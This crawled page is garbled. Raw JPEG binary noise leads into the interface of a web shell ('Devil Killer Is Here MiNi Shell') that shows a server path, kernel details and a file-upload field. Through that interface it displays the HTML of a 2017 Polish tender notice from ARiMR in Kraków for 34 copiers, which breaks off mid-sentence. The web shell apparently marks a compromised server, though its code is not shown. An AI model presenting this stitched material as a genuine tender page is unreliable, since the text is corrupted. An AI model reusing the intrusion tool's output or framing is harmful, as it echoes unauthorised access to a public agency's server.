JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170703/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170703/542862-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 542862-N-2017 z dnia 2017-07-03 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Małopolski Oddział Regionalny Agencji Restrukturyzacji i Modernizacji Rolnictwa</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa trzydziestu czterech urządzeń kopiujących dla Małopolskiego Oddziału Regionalnego ARiMR i Biur Powiatowych ARiMR w województwie małopolskim</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Małopolski Oddział Regionalny Agencji Restrukturyzacji i Modernizacji Rolnictwa</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">1061308300000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Lubicz</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">25</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">31503 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Kraków</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">małopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">126 298 010, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">makiela.wojciech@doplaty.gov.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">124 211 311</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.arimr.gov.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Agencja wykonawcza</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.arimr.gov.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferty mogą być składane wyłacznie w formie pisemnej</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Małopolski Oddział Regionalny ARiMR, ul. Lubicz 25, 31-503 Kraków</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa trzydziestu czterech urządzeń kopiujących dla Małopolskiego Oddziału Regionalnego ARiMR i Biur Powiatowych ARiMR w województwie małopolskim</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">BOR06.2610.05.2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">Jednemu wykonawcy może zostać udzielone zamówienie na obydwie części.</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest dostawa trzydziestu czterech urządzeń kopiujących dla Małopolskiego Oddziału Regionalnego ARiMR oraz Biur Powiatowych ARiMR województwie małopolskim, stosownie do poniżej przedstawionych specyfikacji technicznej i podziału na zadania:Zadanie I:Lp.	Parametr	Urządzenie kopiujące A4 monochromatyczne w liczbie 31 sztuk1	Technologia	Elektrografia laserowa z użyciem tonera proszkowego, utrwalanie tonera bez użycia oleju2	Rozmiar papieru	A4, A5, koperty (C5, DL)3	Szybkość druku	Minimum 50 str./min. A4 (simplex)4	Moduł druku dwustronnego	Zainstalowany w urządzeniu5	Rozdzielczość druku	Minimum 1200x1200 dpi6	Języki druku	PCL5e lub PCL6, emulacja Postscript Level 3, bezpośredni druk dokumentów PDF (w wersji min. 1.4)7	Skaner	ADF min. 100 arkuszy, automatyczny jednoprzebiegowy duplex, skanowanie w kolorze8	Szybkość skanowania jednostronnego	Minimum 50 str./min (Mono)9	Rozdzielczość skanowania	Minimum 600x600 dpi (Mono)10	Funkcje skanowania	Skanowanie do: poczty e-mail, FTP, folderu sieciowego, USB, Zakres powiększania kopii z ADF 25-400%11	Format skanowania	Tiff, jpg, pdf, bezpieczny pdf, xps12	Maksymalna wydajność miesięczna	Nie mniej niż 200 000 stron13	Pojemność podajników papieru	min. 600 arkuszy14	Zainstalowana pamięć	Minimum 256MB, możliwość rozbudowy do min. 1280MB15	Złącza zewnętrzne	Ethernet 10/100, USB 2.016	FAX	33 kb/s17	Obsługiwane systemy operacyjne	dla Microsoft Windows 7-32bit/7-64bit/ 8/8.1-32bit/ 8/8.1-64-bit/ 2003 Server-32bit/ 2003 Server-64bit/2008 Server R2-64bit/2012 Server-64bit (sterownik uniwersalny) instalowany na Windows Server 2003/2008/201218	Obsługa	Kolorowy panel dotykowy z obsługą w języku polskim, urządzenie dodatkowo wyposażone w stolik na kółkach wyprodukowany przez producenta urządzenia 19	Certyfikaty i standardy	Urządzenie musi być produkowane zgodnie z normą Energy Star, urządzenie musi posiadać deklaracje CE20	Materiały eksploatacyjne	Ilość wszystkich materiałów eksploatacyjnych w komplecie z urządzeniem, która pozwoli na wydruk min. 15 000 stron A4 (zgodnie z normą ISO/IEC 19798). Materiały winny być oryginalne (markowane przez producenta drukarek), pełnowartościowe, nieregenerowane i nowe, a ich użycie nie może powodować utraty gwarancji21	Gwarancja	24 miesiące, naprawa w miejscu eksploatacji. Udzielenie gwarancji nie może być uzależnione od zlecania przez Zamawiającego jakichkolwiek odpłatnych przeglądów serwisowych. Jeżeli Wykonawca dla zachowania gwarancji wymaga wykonywania przeglądów ich ewentualny koszt (obejmujący wszystkie niezbędne czynności, materiały, części i dojazd) musi zostać wliczony w cenę urządzenia. Wykonanie ewentualnego przeglądu nie może być uzależnione od ilości kopii, a jedynie od czasu eksploatacji urządzenia i nie wymaga zawiadomienia przez Zamawiającego.Zadanie II:Lp.	Parametr	Urządzenie kopiujące A3 kolorowe w liczbie 3 sztuk1	Technologia	Laserowa lub ledowa kolorowa2	Rozmiar papieru	Minimum A3, A4, A5, koperty (C5, DL)3	Szybkość druku	Minimum 50 str./min. (A4, mono); Minimum 45 str./min. (A4,kolor)4	Moduł druku dwustronnego	Zainstalowany w urządzeniu5	Rozdzielczość druku	Minimum 1200x1200 dpi (mono/kolor)6	Języki druku	PCL5e lub PCL6, emulacja Postscript Level 3, bezpośredni druk dokumentów PDF (w wersji min. 1.4)7	Skaner	ADF min. 100 arkuszy, automatyczny duplex, skanowanie w kolorze8	Szybkość skanowania jednostronnego	Minimum 50 str./min (Mono)9	Rozdzielczość skanowania	Minimum 600x600 dpi Mono10	Funkcje skanowania	Skanowanie do: poczty e-mail, FTP, folderu sieciowego, USB, Zakres powiększania kopii z ADF 25-400%11	Format skanowania	Tiff, jpg, pdf, bezpieczny pdf, xps12	Maksymalna wydajność miesięczna	Nie mniej niż 200 000 stron13	Pojemność podajników papieru	min. 1500 arkuszy14	Zainstalowana pamięć	Minimum 1024MB, możliwość rozbudowy do min. 2048MB15	Złącza zewnętrzne	Ethernet 10/100, USB 2.016	FAX	33 kb/s17	Obsługiwane systemy operacyjne	dla Microsoft Windows 7-32bit/7-64bit/ 8/8.1-32bit/ 8/8.1-64-bit/ 2003 Server-32bit/ 2003 Server-64bit/2008 Server R2-64bit/2012 Server-64bit (sterownik uniwersalny) instalowany na Windows Server 2003/2008/201218	Obsługa	Kolorowy panel dotykowy z obsługą w języku polskim, urządzenie dodatkowo wyposażone w stolik na kółkach wyprodukowany przez producenta urządzenia 19	Certyfikaty i standardy	Urządzenie musi być produkowane zgodnie z normą Energy Star, urządzenie musi posiadać deklaracje CE20	Materiały eksploatacyjne	Ilość wszystkich materiałów eksploatacyjnych w komplecie z urządzeniem, która pozwoli na wydruk min. 15 000 stron A4 mono i 10 000 stron A4 kolor (zgodnie z normą ISO/IEC 19752). Materiały winny być oryginalne (markowane przez producenta drukarek), pełnowartościowe, nieregenerowane i nowe, a ich użycie nie może powodować utraty gwarancji21	Gwarancja	24 miesiące, naprawa w miejscu eksploatacji. Udzielenie gwarancji nie może być uzależnione od zlecania przez Zamawiającego jakichkolwiek odpłatnych przeglądów serwisowych. Jeżeli Wykonawca dla zachowania gwarancji wymaga wykonywania przeglądów ich ewentualny koszt (obejmujący wszystkie niezbędne czynności, materiały, części i dojazd) musi zostać wliczony w cenę urządzenia. Wykonanie ewentualnego przeglądu nie może być uzależnione od ilości kopii, a jedynie od czasu eksploatacji urządzenia i nie wymaga zawiadomienia przez Zamawiającego.2. Urządzenia muszą zostać dostarczone przez Wykonawcę w miejsca wskazane w poniższej tabeli, a następnie wniesione w miejsce instalacji, rozpakowane i przygotowane do uruchomieniaLp.	Miejsce dostawy	Ilość urządzeń kolorowych A3	Ilość urządzeń monochromatycznych A41	Bochnia, ul. Windakiewicza 9/1	0	22	Brzesko, ul. Szczepanowska 23	0	13	Chrzanów, ul. Fabryczna 16	0	14	Dąbrowa Tarnowska, ul. Piłsudskiego 33	0	25	Gorlice, ul. W. Pola 2	0	16	Limanowa, ul. Piłsudskiego 6	0	17	Myślenice, ul. Słowackiego100A	0	18	Nowy Sącz, ul. Kraszewskiego 44	0	19	Nowy Targ, ul. Składowa 7	0	110	Olkusz, ul. Bylicy 1	0	111	Oświęcim, ul. Wyspiańskiego 10	0	112	Proszowice, ul. Krakowska 32	0	113	Sucha Beskidzka, ul. Mickiewicza 19	0	114	Tarnów, ul. Krakowska 134	0	115	Zakopane, ul. Do Samków 29	0	116	Wadowice, ul. Mickiewicza 36	0	117	Niepołomice, ul. 3 Maja 2	0	118	Kraków, ul. Lubicz 25	3	123. Zamawiający wymaga udzielenia przez wykonawców gwarancji na przedmiot zamówienia na minimalny okres co najmniej 24 miesięcy. Okres gwarancji liczony jest od dokonania bezusterkowego odbioru przedmiotu umowy. Zaoferowanie okresu gwarancji krótszego niż 24 miesiące skutkować będzie odrzuceniem oferty. 4. Zamawiający dopuszcza złożenie oferty na jedno wybrane lub obydwa zadania. 5. Jednemu Wykonawcy może zostać udzielone zamówienie na obydwa zadania.6. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. W przypadku realizacji przedmiotu zamówienia z wykorzystaniem podwykonawców, Zamawiający żąda wskazania przez Wykonawcę tych części zamówienia, których wykonanie powierzy podwykonawcom oraz podania firm podwykonawców. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">30121100-4</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">56</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie określa tym zakresie żadnego warunku udziału w postępowaniu.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">W odniesieniu do warunków udziału w postępowaniu dotyczących sytuacji finansowej lub ekonomicznej Zamawiający wymaga, aby Wykonawca posiadał ubezpieczenie od odpowiedzialności cywilnej, w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia:a)	w przypadku zadania I (dostawa trzydziestu jeden urządzeń monochromatycznych) nie mniejszą niż 30 000 PLN,b)	w przypadku zadania II (dostawa trzech urządzeń kolorowych) nie mniejszą niż 15 000 PLN,c)	w przypadku złożenia oferty na obydwa Zadania nie mniejszą niż 45 000 PLN.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">W odniesieniu do warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej Zamawiający wymaga, aby Wykonawca spełniał minimalne warunki umożliwiające realizację zamówienia na odpowiednim poziomie jakości, a dotyczące jego doświadczenia tj. Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, 